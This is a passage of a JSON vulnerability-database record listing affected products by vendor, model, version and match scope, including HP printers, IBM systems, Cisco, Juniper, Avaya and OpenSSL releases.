        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "1.4.1"
      },
      {
        "model": "enterprise linux long life 5.9.server",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "tssc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0"
      },
      {
        "model": "powerlinux 7r4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "vcenter chargeback manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "2.6"
      },
      {
        "model": "network connect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "7.1.0.18193"
      },
      {
        "model": "storevirtual 900gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "463012.0"
      },
      {
        "model": "storevirtual china hybrid storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433512.6"
      },
      {
        "model": "color laserjet cp6015 q3931a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.203.1"
      },
      {
        "model": "system dx360m2 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "73211.42"
      },
      {
        "model": "telepresence mxp series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "blackberry enterprise service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "rim",
        "version": "10.1.2"
      },
      {
        "model": "infosphere balanced warehouse c4000",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.123"
      },
      {
        "model": "mysql",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.7"
      },
      {
        "model": "upward integration modules for vmware vsphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.2"
      },
      {
        "model": "jetdirect ew2500 802.11b/g wireless print server j8021a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "41.16"
      },
      {
        "model": "cit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9.53"
      },
      {
        "model": "color laserjet cm4730 multifunction printer cb483a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "50.286.1"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "3.1"
      },
      {
        "model": "junos r2-s2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "13.3"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.12"
      },
      {
        "model": "family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7900.00"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.50"
      },
      {
        "model": "project metasploit framework",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "metasploit",
        "version": "4.9.1"
      },
      {
        "model": "client connector",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.0"
      },
      {
        "model": "smart update manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.4"
      },
      {
        "model": "integrated management module ii",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.91"
      },
      {
        "model": "laserjet enterprise m4555 mfp ce738a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "junos os 12.2r9",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "color laserjet cm4730 multifunction printer cb480a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "50.286.1"
      },
      {
        "model": "flare experience for ipad",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.2.2"
      },
      {
        "model": "xenclient enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "4.1.4"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4"
      },
      {
        "model": "communicator for ipad",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "lifetime key management appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "bladesystem c-class onboard administrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.20"
      },
      {
        "model": "vix api",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.5"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.12"
      },
      {
        "model": "srg1200\u00262200\u00263200 v100r002c02spc800",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "telepresence server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70100"
      },
      {
        "model": "one-x client enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.2"
      },
      {
        "model": "ei switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "51200"
      },
      {
        "model": "color laserjet cm4730 multifunction printer cb481a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "50.286.1"
      },
      {
        "model": "laserjet pro m401a/d/dn/dnw/dw/n cf270a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "40020150212"
      },
      {
        "model": "project openssl beta2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "2.1"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "winscp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "winscp",
        "version": "5.1"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "13.3"
      },
      {
        "model": "infosphere guardium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.5"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "laserjet enterprise color m855 a2w78a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8000"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.15"
      },
      {
        "model": "message networking sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.2"
      },
      {
        "model": "strm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "2012.1"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.26"
      },
      {
        "model": "prime data center network manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "storevirtual 1tb mdl china sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433011.5"
      },
      {
        "model": "infosphere balanced warehouse d5100",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "cc v200r001c31",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "cognos tm1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.2"
      },
      {
        "model": "junos 13.2r2-s2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 12.1r8",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 11.1r5",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "s12700 v200r005+v200r005hp0",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "xenmobile app controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "2.10"
      },
      {
        "model": "websphere datapower xml accelerator xa35",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0.0"
      },
      {
        "model": "laserjet enterprise color m775 series cc523a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7000"
      },
      {
        "model": "blackberry os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "rim",
        "version": "10.0.10648"
      },
      {
        "model": "laserjet p4014 cb507a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "xenmobile app controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "2.9"
      },
      {
        "model": "database and middleware automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.10"
      },
      {
        "model": "oceanstor s5500t v100r001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "tivoli storage productivity center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1.1.0"
      },
      {
        "model": "8.0-stable",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "software development kit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "storevirtual china hybrid san solution",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433512.6"
      },
      {
        "model": "netscaler build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "8.047.8"
      },
      {
        "model": "enterprise linux server eus 6.4.z",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "vcd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.5.11"
      },
      {
        "model": "security information and event management hf3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "9.1.4"
      },
      {
        "model": "laserjet enterprise color m551 series cf083a 2302963 436083",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "500"
      },
      {
        "model": "websphere datapower soa appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.1.2"
      },
      {
        "model": "documentum content server sp2 p13",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "emc",
        "version": "6.7"
      },
      {
        "model": "enterprise server x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "5"
      },
      {
        "model": "icewall sso dfw r2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.0"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "5.5"
      },
      {
        "model": "agent desktop for cisco unified contact center express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "laserjet p2055 printer series ce456a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "20141201"
      },
      {
        "model": "messaging secure gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "7.1"
      },
      {
        "model": "oneview",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.01"
      },
      {
        "model": "9250c digital sender cb472a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "i v5r4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "smart update manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.0.0"
      },
      {
        "model": "cognos metrics manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.1"
      },
      {
        "model": "one-x client enablement services sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "netiq admininstration console server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "novell",
        "version": "0"
      },
      {
        "model": "director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.1.131"
      },
      {
        "model": "storevirtual 450gb sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.5"
      },
      {
        "model": "s2750\u0026s5700\u0026s6700 v200r005+v200r005hp0",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "41005.1.2"
      },
      {
        "model": "sparc m10-4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "0"
      },
      {
        "model": "junos 13.3r2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "one-x client enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "communication server 1000m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.6"
      },
      {
        "model": "software foundation python",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "python",
        "version": "3.5"
      },
      {
        "model": "power express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7100"
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "laserjet enterprise color m855 a2w79a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8000"
      },
      {
        "model": "netscaler",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "10.0-76.7"
      },
      {
        "model": "bbm for iphone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "rim",
        "version": "0"
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.0.4"
      },
      {
        "model": "anyconnect secure mobility client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "9.3"
      },
      {
        "model": "documentum content server sp2 p14",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "emc",
        "version": "6.7"
      },
      {
        "model": "communication server 1000m signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.6"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.3.8.3"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.1"
      },
      {
        "model": "color laserjet cp6015 q3934a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "tivoli endpoint manager for remote control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "flex system enterprise chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8721"
      },
      {
        "model": "color laserjet m651 cz257a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.0"
      },
      {
        "model": "laserjet enterprise m4555 mfp ce502a 2302963 436064",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "vsphere virtual disk development kit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.5"
      },
      {
        "model": "ive os 8.0r2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "system storage ts2900 tape librray",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0033"
      },
      {
        "model": "laserjet enterprise m4555 mfp ce504a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "communication server 1000e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.6"
      },
      {
        "model": "laserjet cm3530 multifunction printer cc519a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "4.0.9"
      },
      {
        "model": "ecns600 v100r001c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "netscaler",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "10.0-77.5"
      },
      {
        "model": "web gateway",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.4.2.1"
      },
      {
        "model": "snapdrive for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.3"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "11.3"
      },
      {
        "model": "laserjet p3005 printer series q7816a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.190.3"
      },
      {
        "model": "jabber voice for iphone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.6"
      },
      {
        "model": "9.3-prerelease",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "unified ip conference phone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "88310"
      },
      {
        "model": "project openssl 1.0.0e",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "junos os 12.1x46-d25",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "laserjet p4515 cb516a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.213.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.172"
      },
      {
        "model": "project openssl beta1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0"
      },
      {
        "model": "aura application server sip core pb19",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53002.0"
      },
      {
        "model": "bladecenter js22",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "(7998-61x)0"
      },
      {
        "model": "storevirtual 450gb china sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.15"
      },
      {
        "model": "project openssl a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.65"
      },
      {
        "model": "executive scorecard",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9.41"
      },
      {
        "model": "epolicy orchestrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "4.6.5"
      },
      {
        "model": "8.4-releng",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "infosphere balanced warehouse c3000",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "4.3.6"
      },
      {
        "model": "esxi",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.5"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6.4"
      },
      {
        "model": "junos 12.3r7",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx7800",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "security manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "uacos c5.0",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "strm/jsa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "2013.2"
      },
      {
        "model": "junos 12.3r3",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "z/tpf",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.10"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.40"
      },
      {
        "model": "security network intrusion prevention system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "storevirtual fc 900gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "473011.5"
      },
      {
        "model": "laserjet enterprise color mfp m880 d7p70a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8000"
      },
      {
        "model": "communication server 1000m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "storevirtual 1tb mdl sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.5"
      },
      {
        "model": "storevirtual hybrid storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433512.0"
      },
      {
        "model": "laserjet p4515 cb514a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.2.0.9"
      },
      {
        "model": "puredata system for operational analytics a1791",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "dsm v100r002c05spc615",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "mysql",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.6"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "4.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.55"
      },
      {
        "model": "system x3400m2 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "78361.42"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "message networking",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2.2"
      },
      {
        "model": "fortirecorder",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "1.5"
      },
      {
        "model": "project openssl 0.9.8t",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "cognos insight standalone fp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2"
      },
      {
        "model": "communication server 1000m signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "vdi communicator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.0"
      },
      {
        "model": "bladecenter js23",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "(7778-23x)0"
      },
      {
        "model": "winscp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "winscp",
        "version": "5.1.5"
      },
      {
        "model": "hosted collaboration mediation fulfillment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "3.2.0"
      },
      {
        "model": "aura messaging",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.1"
      },
      {
        "model": "msa storage gl200r007",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2040"
      },
      {
        "model": "communication server 1000e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "icewall sso certd r3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.0"
      },
      {
        "model": "command view server based management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.3.2"
      },
      {
        "model": "storevirtual 450gb sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453012.5"
      },
      {
        "model": "laserjet printer series q7697a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9040/90508.260.3"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.161"
      },
      {
        "model": "storevirtual vsa software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "12.5"
      },
      {
        "model": "paging server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "xenclient enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.0.6"
      },
      {
        "model": "fortigate",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "4.3.5"
      },
      {
        "model": "data ontap smi-s agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1.2"
      },
      {
        "model": "9500e family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "ace application control engine module ace20",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "laserjet enterprise m712 series cf235a 2302963 436080",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "700"
      },
      {
        "model": "cloud manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1"
      },
      {
        "model": "fortisandbox build",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "1.3.086"
      },
      {
        "model": "hyperdp oceanstor n8500 v200r001c09",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0.2"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.1"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "4.0.4"
      },
      {
        "model": "aura experience portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.94"
      },
      {
        "model": "agent desktop for cisco unified contact center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6"
      },
      {
        "model": "vcenter site recovery manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.0.31"
      },
      {
        "model": "dgs-1210-28p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "4.00.043"
      },
      {
        "model": "telepresence system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11000"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
